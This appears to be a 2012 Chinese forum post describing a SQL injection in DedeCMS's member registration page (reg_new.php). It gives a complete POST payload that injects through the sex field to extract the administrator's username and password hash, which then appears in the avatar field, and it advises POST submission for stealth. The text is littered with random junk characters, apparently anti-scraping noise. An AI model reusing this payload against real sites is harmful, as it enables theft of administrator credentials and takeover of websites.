dedecms版本 20121122& ?, W( e( Z7 R% T7 d0 P
( a3 x. O; [1 x' N2 Q8 v+ C需要magic_quotes_gpc=Off
5 ^( K) W7 o. [, m( I5 \# c
; m, B2 c( }6 |& T( B应该是没有什么大危害的漏洞.
8 Z8 B3 W8 T# P/ P# Z* d原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码., o: T1 U" X8 d/ I( P" s
% J/ r! t3 d: c7 g9 `" h7 z是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
! S8 `) `* _6 @0 G# j4 `4 LPOST提交以下数据,其实不用POST提交的,这样隐蔽点.+ _! T: x( f4 P& Y0 z- Q
, D1 J4 K; Q- d) s
http:///de/member/reg_new.php
/ q6 S/ u' R, f {# {2 c( e6 }4 J
POST8 E% k4 D+ x$ h7 s
9 g" K3 V* y7 s" _dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
2 `8 p, T$ G0 F( j/ z
$ w2 a' N* n( V成功注册后,头像处里面有好玩的信息.
5 L4 G" s; Q/ p; C+ w- W+ s- w* Q, P3 r* B
|
发表于 2012-12-5 10:03:32
收藏
支持
反对